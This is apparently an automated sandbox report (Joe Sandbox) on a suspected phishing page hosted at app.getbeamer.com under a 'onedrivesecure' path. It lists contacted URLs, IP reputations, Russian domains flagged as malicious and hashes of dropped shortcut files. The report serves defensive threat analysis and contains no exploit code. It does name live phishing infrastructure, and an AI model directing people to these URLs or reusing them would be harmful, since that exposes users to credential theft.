                                                                                    https://login.microsoftonline.com/common/instrumentation/reportstaticmecontroltelemetry?hpgid=1104&hpgact=1800&client-request-id=7a99c850-cb6f-44b7-b6c1-3d543fe012ef&hpgrequestid=0772180c-4e4b-4875-af4d-f5ad34553a00false
                                                                                      high
                                                                                      https://www.office.com/loginfalse
                                                                                        high
                                                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=905a5214bea60fa5&lang=autofalse
                                                                                          high
                                                                                          https://login.microsoftonline.com/favicon.icofalse
                                                                                            high
                                                                                            https://app.getbeamer.com/js/highlight.pack.jsfalse
                                                                                              high
                                                                                              https://app.getbeamer.com/onedrivesecure/enfalse
                                                                                                high
                                                                                                https://app.getbeamer.com/images/logo.svgfalse
                                                                                                  high
                                                                                                  https://app.getbeamer.com/js/scroll.jquery.jsfalse
                                                                                                    high
                                                                                                    https://app.getbeamer.com/loadMoreNews?app_id=yCPizuyh73191&language=EN&user_id=876d4375-575e-495b-ac98-b2829ba9249f&publicPage=true&post=false&basePath=https%3A%2F%2Fapp.getbeamer.com%2Fonedrivesecure%2Fenfalse
                                                                                                      high
                                                                                                      https://identity.nel.measure.office.net/api/report?catId=GW+estsfd+ams2false
                                                                                                        high
                                                                                                        https://app.getbeamer.com/styles/public.css?v=f2false
                                                                                                          high
                                                                                                          https://app.getbeamer.com/pictures?id=458662-77-9a--_ve-_vVfvv70WFe-_vSrvv703Eu-_vX0c77-9TgVq77-977-9Xe-_ve-_vUzvv73vv73vv71F77-9&v=4false
                                                                                                            high
                                                                                                            https://app.getbeamer.com/js/perfect-scrollbar.jquery.min.jsfalse
                                                                                                              high
                                                                                                              https://a.nel.cloudflare.com/report/v4?s=gV93%2FFUHZT68U4A6EOJVhQX6Xa8X%2BEzfCFEzZuMV%2BOkT8tSJogm8lxr10R6QfZjl35GPJPaDghJhxsRvioqPTIwksRHx%2Bvy6pYqJOsoJBf1U35xnHfFOstLy1ONdWQ%3D%3Dfalse
                                                                                                                high
                                                                                                                https://app.getbeamer.com/images/favicon.icofalse
                                                                                                                  high
                                                                                                                  https://app.getbeamer.com/images/resource-loading.giffalse
                                                                                                                    high
                                                                                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                    https://app.getbeamer.com/onedrivesecure/ideas/enchromecache_148.2.drfalse
                                                                                                                      high
                                                                                                                      https://app.getbeamer.com/fonts/material-icons.woffchromecache_135.2.drfalse
                                                                                                                        high
                                                                                                                        https://www.getbeamer.com/?ref=watermark_yCPizuyh73191&company=Onechromecache_148.2.drfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://app.getbeamer.com/onedrivesecure/en/stillwell-hansen-thermal-parts-idIm9vr6chromecache_146.2.drfalse
                                                                                                                          high
                                                                                                                          https://app.getbeamer.com/fonts2/Lato-Bold.eotchromecache_135.2.drfalse
                                                                                                                            high
                                                                                                                            https://wXXI.deripaud.ru/n682ZHUO/chromecache_146.2.drfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://gmetrics.getbeamer.comchromecache_135.2.drfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            http://www.joincube.comchromecache_123.2.drfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://app.getbeamer.com/fonts/material-icons.eotchromecache_135.2.drfalse
                                                                                                                              high
                                                                                                                              https://www.getbeamer.com/chromecache_148.2.drfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://app.getbeamer.com/fonts2/Lato-Regular.svgchromecache_135.2.drfalse
                                                                                                                                high
                                                                                                                                https://app.getbeamer.com/fonts/material-icons.woff2chromecache_135.2.drfalse
                                                                                                                                  high
                                                                                                                                  https://app.getbeamer.com/fonts2/Lato-Normal-300b.woff2)chromecache_135.2.drfalse
                                                                                                                                    high
                                                                                                                                    https://app.getbeamer.com/fonts2/Lato-Bold.ttfchromecache_135.2.drfalse
                                                                                                                                      high
                                                                                                                                      https://app.getbeamer.com/onedrivesecure/en?category=newchromecache_148.2.drfalse
                                                                                                                                        high
                                                                                                                                        https://app.getbeamer.com/fonts2/Lato-Regular.woffchromecache_135.2.drfalse
                                                                                                                                          high
                                                                                                                                          https://app.getbeamer.com/onedrivesecure/en?page=1chromecache_148.2.drfalse
                                                                                                                                            high
                                                                                                                                            https://app.getbeamer.com/images/bell-full.svg);border-radius:50%;color:#fff;padding-left:16px;paddichromecache_135.2.drfalse
                                                                                                                                              high
                                                                                                                                              https://app.getbeamer.com/images/social/copy.svgchromecache_135.2.drfalse
                                                                                                                                                high
                                                                                                                                                https://app.getbeamer.comchromecache_133.2.dr, chromecache_107.2.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://app.getbeamer.com/fonts/material-icons.ttfchromecache_135.2.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://app.getbeamer.com/onedrivesecure/en?allchromecache_148.2.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://app.getbeamer.com/fonts2/Lato-Normal-300a.woff2)chromecache_135.2.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://gravatar.com/avatar/chromecache_133.2.dr, chromecache_107.2.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://twitter.com/intent/tweet?text=Stillwellchromecache_146.2.drfalse
                                                                                                                                                            high
                                                                                                                                                            http://www.getbeamer.comchromecache_123.2.drfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://app.getbeamer.com/images/social/whatsapp.svgchromecache_135.2.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://login.windows-ppe.netchromecache_102.2.dr, chromecache_118.2.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://www.getbeamer.com/?ref=watermark_yCPizuyh73191_public&amp;company=Onechromecache_148.2.drfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                unknown
                                                                                                                                                                https://www.getbeamer.com/?ref=watermark_logo_yCPizuyh73191&company=Onechromecache_148.2.drfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                unknown
                                                                                                                                                                https://app.getbeamer.com/pictures?id=458662-77-9a--_ve-_vVfvv70WFe-_vSrvv703Eu-_vX0c77-9TgVq77-977-chromecache_146.2.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://login.microsoftonline.comchromecache_102.2.dr, chromecache_118.2.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://app.getbeamer.com/fonts2/Lato-Bold.woffchromecache_135.2.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://www.linkedin.com/shareArticle?source=Beamer&amp;mini=true&amp;title=Stillwellchromecache_146.2.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://api.whatsapp.com/send?text=https%3A%2F%2Fapp.getbeamer.com%2Fonedrivesecure%2Fen%2Fstillwellchromecache_146.2.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://app.getbeamer.com/fonts2/Lato-Regular.ttfchromecache_135.2.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://app.getbeamer.com/chromecache_133.2.dr, chromecache_107.2.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://app.getbeamer.com/fonts2/Lato-Bold.svgchromecache_135.2.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://app.getbeamer.com/fonts2/Lato-Normal-700b.woff2)chromecache_135.2.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://app.getbeamer.com/fonts2/Lato-Normal-700a.woff2)chromecache_135.2.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://app.getbeamer.com/images/logo.svg);chromecache_123.2.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://app.getbeamer.com/images/close.svg);background-position:center;opacity:.3chromecache_135.2.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://app.getbeamer.com/onedrivesecure/roadmap/enchromecache_148.2.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://app.getbeamer.com/fonts2/Lato-Bold.woff2chromecache_135.2.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://app.getbeamer.com/images/social/twitter.svgchromecache_135.2.drfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://app.getbeamer.com/fonts2/Lato-Normal-400a.woff2)chromecache_135.2.drfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://app.getbeamer.com/fonts2/Lato-Normal-400b.woff2)chromecache_135.2.drfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://app.getbeamer.com/fonts2/Lato-Regular.eotchromecache_135.2.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://git.io/vwTVlchromecache_122.2.dr, chromecache_105.2.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://app.getbeamer.com/fonts2/Lato-Regular.woff2chromecache_135.2.drfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://app.getbeamer.com/images/logo.svg)chromecache_135.2.drfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://app.getbeamer.com/images/social/linkedin.svgchromecache_135.2.drfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://app.getbeamer.com/images/social/facebook.svgchromecache_135.2.drfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://static.getbeamer.com/emoji/chromecache_132.2.dr, chromecache_131.2.drfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://markjs.io/chromecache_122.2.dr, chromecache_105.2.drfalse
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                                                • 75% < No. of IPs
                                                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                13.107.6.156
                                                                                                                                                                                                                b-0004.b-msedge.netUnited States
                                                                                                                                                                                                                8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                104.18.94.41
                                                                                                                                                                                                                challenges.cloudflare.comUnited States
                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                151.101.130.137
                                                                                                                                                                                                                code.jquery.comUnited States
                                                                                                                                                                                                                54113FASTLYUSfalse
                                                                                                                                                                                                                142.250.185.164
                                                                                                                                                                                                                www.google.comUnited States
                                                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                                                172.67.177.125
                                                                                                                                                                                                                wxxi.deripaud.ruUnited States
                                                                                                                                                                                                                13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                151.101.66.137
                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                54113FASTLYUSfalse
                                                                                                                                                                                                                35.190.80.1
                                                                                                                                                                                                                a.nel.cloudflare.comUnited States
                                                                                                                                                                                                                15169GOOGLEUSfalse
                                                                                                                                                                                                                104.26.2.186
                                                                                                                                                                                                                app.getbeamer.comUnited States
                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                88.221.110.211
                                                                                                                                                                                                                a1894.dscb.akamai.netEuropean Union
                                                                                                                                                                                                                20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                104.17.24.14
                                                                                                                                                                                                                cdnjs.cloudflare.comUnited States
                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                239.255.255.250
                                                                                                                                                                                                                unknownReserved
                                                                                                                                                                                                                unknownunknownfalse
                                                                                                                                                                                                                188.114.96.3
                                                                                                                                                                                                                7aopff8hhi2robm5gdfgzr8tt8v2krcgoy6uuy3lmhpmq5udo24.deryposi.ruEuropean Union
                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                104.17.25.14
                                                                                                                                                                                                                unknownUnited States
                                                                                                                                                                                                                13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                40.126.32.138
                                                                                                                                                                                                                www.tm.ak.prd.aadg.trafficmanager.netUnited States
                                                                                                                                                                                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                IP
                                                                                                                                                                                                                192.168.2.16
                                                                                                                                                                                                                192.168.2.7
                                                                                                                                                                                                                Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                                Analysis ID:1596278
                                                                                                                                                                                                                Start date and time:2025-01-21 22:14:01 +01:00
                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                Overall analysis duration:0h 3m 55s
                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                                                                                Sample URL:https://app.getbeamer.com/onedrivesecure/en
                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                Number of analysed new started processes analysed:14
                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                Classification:mal60.phis.win@22/133@38/16
                                                                                                                                                                                                                EGA Information:Failed
                                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                                • Number of executed functions: 0
                                                                                                                                                                                                                • Number of non-executed functions: 0
                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 2.22.50.144, 142.250.184.227, 142.250.185.142, 64.233.166.84, 216.58.206.78, 172.217.16.206, 142.250.185.78, 216.58.212.138, 142.250.181.234, 142.250.186.170, 142.250.185.202, 142.250.185.170, 142.250.184.202, 216.58.206.42, 142.250.185.138, 142.250.184.234, 172.217.16.138, 142.250.185.74, 142.250.186.106, 172.217.18.10, 172.217.16.202, 142.250.185.234, 142.250.185.106, 142.250.185.110, 142.250.184.206, 142.250.185.238, 216.58.212.142, 142.250.181.227, 20.190.159.73, 20.190.159.64, 20.190.159.71, 20.190.159.23, 40.126.31.67, 40.126.31.69, 40.126.31.71, 20.190.159.75, 20.190.159.2, 40.126.31.73, 20.190.159.0, 142.250.186.138, 172.217.23.106, 13.69.116.109, 142.250.186.110, 4.245.163.56, 184.28.90.27, 13.107.246.45
                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, www.tm.lg.prod.aadmsa.akadns.net, clientservices.googleapis.com, onedscolprdweu12.westeurope.cloudapp.azure.com, clients2.google.com, redirector.gvt1.com, login.live.com, update.googleapis.com, clients1.google.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, aadcdnoriginwus2.azureedge.net, www.tm.v4.a.prd.aadg.akadns.net, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, login.msa.msidentity.com, eu.events.data.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com, www.tm.lg.prod.aadmsa.trafficmanager.net, eu-mobile.events.data.microsoft.com
                                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                • VT rate limit hit for: https://app.getbeamer.com/onedrivesecure/en
                                                                                                                                                                                                                No simulations
                                                                                                                                                                                                                No context
                                                                                                                                                                                                                No context
                                                                                                                                                                                                                No context
                                                                                                                                                                                                                No context
                                                                                                                                                                                                                No context
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 21 20:14:45 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2673
                                                                                                                                                                                                                Entropy (8bit):3.9898056246021576
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:8bdtT1FEHhidAKZdA1FehwiZUklqehTy+3:8Db2Iy
                                                                                                                                                                                                                MD5:9CAF98921AF53E06E966E64273E47545
                                                                                                                                                                                                                SHA1:1DCD2B94269A27AC3B8733195757F8996BAB7FCE
                                                                                                                                                                                                                SHA-256:DA2C1D385C5D9BE7B7208BB03A333CB42838FC8768574F1CE94ACA4A9D38E50C
                                                                                                                                                                                                                SHA-512:E4511EB6E7F52EE51FF1A236983DEBE4A28A6141CBF6D4C4BDFB36B03821D7AD00109DBEB053F38E6236B072D70F2D335703A17378773DDAD3BC6E674803E7C1
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:L..................F.@.. ...$+.,......~Il..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I5Z.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V5Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V5Z.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V5Z............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V5Z............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............7.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 21 20:14:44 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2675
                                                                                                                                                                                                                Entropy (8bit):4.006630465921565
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:8ydtT1FEHhidAKZdA1seh/iZUkAQkqeh4y+2:88bQ9Q1y
                                                                                                                                                                                                                MD5:25ACAE93F52A60AABE1B6C9243CC9B94
                                                                                                                                                                                                                SHA1:F0D2A60B040092CD7AF16E5E5CA679EE90DBE80A
                                                                                                                                                                                                                SHA-256:12338726D3BDAA3CD00910A2AF1F2035C621CAAB4A6958B7CE515FFEF1A33B70
                                                                                                                                                                                                                SHA-512:BC6EF5DBDBB38D31AC8F65C867E16C2A27AF9D2E3FA0A9564047C0C8247CD4B0479C68577CE15B0BF56E3DCCB113B1F40FB622F90780948CB8DAEF0BDCC37B18
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:L..................F.@.. ...$+.,......u~Il..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I5Z.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V5Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V5Z.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V5Z............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V5Z............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............7.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2689
                                                                                                                                                                                                                Entropy (8bit):4.015761245975095
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:83dtT1FAHhidAKZdA14meh7sFiZUkmgqeh7s6y+BX:8XbAnUy
                                                                                                                                                                                                                MD5:E4AE7F9585848CAA7E40ECFC31050E3F
                                                                                                                                                                                                                SHA1:19C51875E54F8575752EB9E492295FC705AA7FFD
                                                                                                                                                                                                                SHA-256:893B426C59C6D83052D5F69A12E8991826A87A968A904814A53CA689489F8EDC
                                                                                                                                                                                                                SHA-512:9DD499F07714FB6A8FD4B93FDD7D23239396E34C7E215E71DF55D74E040D1DCC32DC1A7F3F81BEA2E4B39BA6855022EE6AC9C19051D4ADF9B76A0FAF180EAD10
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I5Z.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V5Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V5Z.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V5Z............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............7.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 21 20:14:44 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2677
                                                                                                                                                                                                                Entropy (8bit):4.003290056336865
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:8hdtT1FEHhidAKZdA1TehDiZUkwqeh8y+R:8pbLCy
                                                                                                                                                                                                                MD5:A18C177196B6A3C0A2CE55FC32594B20
                                                                                                                                                                                                                SHA1:6ABC04B7EE9FAB3525AE5130E4182C3470C91EB5
                                                                                                                                                                                                                SHA-256:BA2F510F1B68A0CE2C184A09D846538A2B76AFC6DB7FD0FBCF7CB05FA99C4FFA
                                                                                                                                                                                                                SHA-512:E894FE29875E0391645FB14015C3496A34A4F8F12E434FC93CBE7D765B6B2B4A6F35124E6336EB78B81102A23D6DF2ABB4EFC66C9F7096541BB4B0A0513DC44B
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:L..................F.@.. ...$+.,......m~Il..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I5Z.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V5Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V5Z.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V5Z............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V5Z............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............7.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 21 20:14:44 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2677
                                                                                                                                                                                                                Entropy (8bit):3.993739337655734
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:8HddtT1FEHhidAKZdA1dehBiZUk1W1qehGy+C:8Hdbr9my
                                                                                                                                                                                                                MD5:416200BAB36CA4431478873DA6EB52E1
                                                                                                                                                                                                                SHA1:B1CFD37DAEA2F88755E02B65E32914B48004621A
                                                                                                                                                                                                                SHA-256:4088BF3A3523340BE529E91A14E5DDF0690D7A43DD22FD36D89D260D7A75C7FE
                                                                                                                                                                                                                SHA-512:7B2519552BDABBEC1F8CC935BB09A3666546B1BEAF665363165467D05750298BD87063779DCA36677A8783CEAE1F3877AD2CC4428E1113CBFAB8E0870F00B390
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                Preview:L..................F.@.. ...$+.,..../..~Il..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I5Z.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V5Z.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V5Z.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V5Z............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V5Z............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............7.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 21 20:14:44 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                Category:dropped
